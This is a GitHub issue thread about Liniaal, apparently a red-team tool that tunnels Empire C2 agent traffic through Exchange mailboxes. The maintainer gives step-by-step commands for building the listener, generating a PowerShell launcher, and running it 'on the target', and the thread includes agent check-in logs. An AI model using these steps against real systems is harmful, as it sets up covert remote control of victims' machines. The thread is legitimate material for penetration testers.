liniaal icon indicating copy to clipboard operation
liniaal copied to clipboard

Published 20 hours ago verified publisher icon sensepost

Could not get the agent connected.

Open 3xpl01tc0d3r opened this issue 6 years ago • 5 comments

Facing issue while using launcher with mapi listener & after some fix still not able to get the agent connected.

After executing the payload manually it seems like the payload is missing some "}"

Below is the error

Missing closing '}' in statement block or type definition.
    + CategoryInfo          : ParserError: (:) [], ParentContainsErrorRecordException
    + FullyQualifiedErrorId : MissingEndCurlyBrace

Attached is the http_mapi.py code which I used after some fix.

http_mapi.txt

3xpl01tc0d3r avatar Jul 04 '18 16:07 3xpl01tc0d3r

Hi!

Using the fork at staaldraad/liniaal and copying the http_mapy.py and http_mapi.ps1 files across, I get the agent to connect.

I've had to make a fix to include the "Slack_Token" - but even without this, the agent should still setup correctly. The changes are available in this branch: https://github.com/staaldraad/liniaal/tree/empire-updates

There is another issue now though, looks like communications have slightly changed (I think) because the agent stops checking in after the first check-in. I think I know what is happening but I'm still looking into this, I'll hopefully get some time later tonight.

staaldraad avatar Jul 05 '18 07:07 staaldraad

And fixed. The new Empire agent uses GetTask and SendMessage instead of Get-Task and Send-Message for the comms functions.

I've updated my fork to include these changes. I'll open PRs for Empire and for this Repo.

staaldraad avatar Jul 05 '18 09:07 staaldraad

I am still not able to get the agent connected. I downloaded the http_mapi.py code which you have modified but still not able to get it connected.

3xpl01tc0d3r avatar Jul 05 '18 18:07 3xpl01tc0d3r

I've just tested again with the following steps:

git clone https://github.com/staaldraad/Empire.git
cd Empire
git checkout update-mapi-agent
./setup/install.sh
./empire

Then in Empire

> listeners
> uselistener http_mapi
> set Email <targetMailbox>
> set Folder yourfolder #try a different folder from the default Liniaal
> execute
> launcher powershell
<copy this launcher>

Start Liniaal "proxy"

./liniaal
> set Email <targetEmail>
> set Password <password>
> set Host http://locationOfEmpire #in my case the same host, so http://localhost
> set Folder yourfolder #same as set above
> execute

The above might crash out the first time, as it creates the non-existing folder. Just run again and it should work.

Now launch the powershell command on the target.

You should see something similar to this in the Liniaal proxy:

[+] Agent Listening                                                                                                     
[+] Got message from Agent at: 05/07/2018 10:21:11 AM Payload: GET - 7BQzGKC4y1yQ1CzqHnGdGanPtWM= - /news.php
[+] Got message from Agent at: 05/07/2018 10:21:13 AM Payload: GET - QQX7CTjK6NP4wSvpEDHFGhiXYo0= - /news.php
[+] Got message from Agent at: 05/07/2018 10:22:02 AM Payload: POSTM - /admin/get.php - JaliNK12iwz+

In Empire you might see the following messages. I'll have a look to find why these are coming through.

[!] Error: bad signal recieved [*] GET request for localhost/ ViKAJSshm4wMrTJQE3xtf690JZM= from 127.0.0.1 from sender listeners/http
[!] Error: bad signal recieved [*] Sending POWERSHELL stager (stage 1) to 127.0.0.1 from sender listeners/http

It is all pretty slow, but the comms were working for me.

image

staaldraad avatar Jul 05 '18 18:07 staaldraad

Thanks for step by step guide. I tried it with outlook.com email address and it worked but it is not working with my own lab exchange server. I cannot even see that liniaal proxy sending any payload when trying with my lab exchange environment.

3xpl01tc0d3r avatar Jul 07 '18 16:07 3xpl01tc0d3r